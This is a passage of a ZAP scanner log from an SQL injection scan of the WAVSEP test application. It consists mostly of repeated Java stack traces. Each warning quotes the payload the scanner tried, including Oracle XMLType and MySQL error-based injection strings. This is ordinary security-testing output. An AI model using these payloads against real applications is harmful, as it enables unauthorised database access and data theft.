END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- tUzj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679247 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2629=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2629=2629) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('zkQi'='zkQi] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 2629=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2629=2629) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('zkQi'='zkQi at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679248 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8707=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8707=8707) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (5393=5393] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 8707=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8707=8707) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (5393=5393 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679248 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 1587=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1587=1587) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'QAjV'='QAjV] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 1587=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1587=1587) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'QAjV'='QAjV at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679249 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7033=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7033=7033) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7033=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7033=7033) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679249 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 1785=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1785=1785) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 1785=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1785=1785) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679251 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 1615=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1615=1615) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- Jdtk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 1615=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1615=1615) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- Jdtk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679251 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 2416=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2416=2416) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('NlYG'='NlYG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 2416=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2416=2416) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('NlYG'='NlYG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679257 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 1086 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1086=1086,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 1086 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1086=1086,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679257 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 5664=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5664=5664) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'fFst'='fFst] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 5664=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5664=5664) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'fFst'='fFst at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679258 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(7298=7298,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(7298=7298,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679259 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 6475=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6475=6475) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 6475=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6475=6475) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 